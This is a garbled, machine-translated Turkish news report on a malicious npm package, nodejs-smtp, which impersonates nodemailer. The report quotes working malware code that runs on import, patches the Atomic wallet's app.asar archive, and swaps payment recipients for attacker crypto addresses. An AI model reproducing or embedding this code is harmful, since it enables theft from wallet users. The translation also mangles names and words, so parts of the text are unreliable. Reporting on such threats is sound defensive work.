Kötü niyetli NPM Paketi, Kripto İşlemlerini Kaçmak İçin Haftalık 3,9 milyon İndirme ile Popüler NodeMiler olarak taklit ediyor


Kötü niyetli NPM Paketi, Kripto İşlemlerini Kaçmak İçin Haftalık 3,9 milyon İndirme ile Popüler NodeMiler olarak taklit ediyor

Socket.dev’deki güvenlik araştırmacıları, Ağustos 2025’in sonlarında sofistike bir tedarik zinciri saldırısı ortaya çıkardı. nodejs-smtpyaygın olarak kullanılan e -posta kütüphanesi olarak maskelenen nodudailerhaftalık yaklaşık 3,9 milyon indirme ile övünüyor.

İlk bakışta, Nodejs-SMTP, tanıdık bir API sağlayan ve e-postaları başarıyla gönderen meşru muadiliyle aynı şekilde çalışır.

Bu aldatıcı işlevsellik, Windows sistemlerine yüklenen masaüstü kripto para cüzdanlarını avlayan gizli işlemlere sessizce ilgilenen bir Truva atı olarak hizmet eder.

Google Haberleri

Kötü niyetli paket (kaynak – soket.dev)

Kuruluşlar açık kaynaklı bağımlılıkları kalkınma boru hatlarına entegre etmeye devam ettikçe, saldırganlar ithalat süresi kurcalama gücünü tanıdı.

Socket.DEV analistleri, ithalat üzerine NodeJS-SMTP’nin hemen atom cüzdanı ve Çıkış gibi cüzdanlara sızmak için tasarlanmış bir elektron tabanlı yükü çağırdığını belirtti.

Cüzdanın ambalajını açarak Uygulama. Basar Arşiv, kritik bir satıcı paketinin kötü niyetli kodlarla değiştirilmesi ve ardından arşivi yeniden paketleyen saldırgan, kalıcılık ve gizlilik sağlar.

Bu manipülasyonu takiben, tehlikeye atılan cüzdan tarafından başlatılan herhangi bir işlem yeniden yönlendirilir ve amaçlanan alıcı adresinin tehdit oyuncusu tarafından kontrol edilen biriyle değiştirilir.

Socket.DEV analistleri ayrıca, NPM takma adı altında faaliyet gösteren tehdit oyuncusunun nikotimonsert kodlanmış cüzdan adreslerini doğrudan enjekte edilen yüke yerleştirir.

Bu adresler Bitcoin, Ethereum, Tether (hem ERC-20 hem de TRC-20), XRP ve Solana’yı içerir ve çok akın hırsızlığını kolaylaştırır.

Her ne kadar NodeJS-SMTP için ilk indirme sayıları nispeten düşük olmasına rağmen-keşif sırasında yaklaşık 342-yaygın uzlaşma potansiyeli, nodEmailer’in üretim ortamlarındaki yaygınlığı göz önüne alındığında yüksek olmaya devam etmektedir.

Bu bulgular ışığında, geliştiriciler ve güvenlik ekiplerinin titiz tedarik zinciri savunmaları benimsemeleri istenir.

Önerilen önlemler arasında yan etki ithalatının gerçek zamanlı analizi, yeni bağımlılıklar için kod inceleme politikalarının sıkı bir şekilde uygulanması ve paket kurulumu sırasında arşiv-manipülasyon modellerini işaretlemek için otomatik takımların dağıtılması yer alır.

Risk, bağımlılıklar fonksiyonel olarak doğru göründüğünde bu tür kurcalamayı tespit etme olasılığı düşüktür.

Enfeksiyon mekanizması ve kalıcılık taktikleri

Nodejs-SMTP’nin enfeksiyon stratejisine daha derinlemesine girmek, elektronun ambalaj formatını kullanan iki aşamalı bir işlemi ortaya çıkarır.

İlk aşamada, paketin lib/motor/index.js Komut dosyası içe aktarıldıktan hemen sonra yürütülür:-

// lib/engine/index.js
const os = require('os');
const fs = require('fs').promises;
const path = require('path');
const asar = require('asar');

async function patchAtomic() {
  try {
    const base    = path.join(os.homedir(), 'AppData', 'Local', 'Programs');
    const resDir  = path.join(base, 'atomic', 'resources');
    const asarIn  = path.join(resDir, 'app.asar');
    const workDir = path.join(resDir, 'output');
    const implant = path.join(__dirname, 'a.js');
    const target  = path.join(workDir, 'dist', 'electron', 'vendors.64b69c3b00e2a7914733.js');

    await fs.mkdir(workDir, { recursive: true });
    asar.extractAll(asarIn, workDir);
    await fs.copyFile(implant, target);
    asar.createPackage(workDir, asarIn);
    await fs.rm(workDir, { recursive: true, force: true });
  } catch {}
}

patchAtomic();

Bu rutin cüzdan arşivini açar, satıcı demetini kötü amaçlı yükle üzerine yazar A.JSve izleri maskelemek için bütünlük kontrollü arşivi yeniden paketler.

Bir sonraki cüzdan lansmanı üzerine, A.JS İşlem yapımını keser ve alıcı adresini değiştirir ve giden her ödemenin yönlendirilmesini sağlar:

// lib/engine/a.js
async sendCoins() {
  if (await this.validatePassword()) {
    if (this.coin.ticker === 'BTC')
      this.inputs.address="17CNLs7rHnnBsmsCWoTq7EakGZKEp5wpdy";
    else if (this.coin.ticker === 'ETH' || this.coin.ticker === 'USDT')
      this.inputs.address="0x26Ce898b746910ccB21F4C6316A5e85BCEa39e24";
    // Additional mappings for TRX-USDT, XRP, SOL omitted
  }
}

İthalat sırasında yürüterek, Nodejs-SMTP, işlev çağrılarını çalışma zamanında inceleyen statik tarayıcılar tarafından algılamayı önler. Bu kalıcı, ithalat-zaman kancası, açık kaynaklı ekosistemler içindeki gelişen tehdit manzarasını vurgular ve tedarik zincirine duyulan güvenlik önlemlerine olan ihtiyacın altını çizer.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.



Source link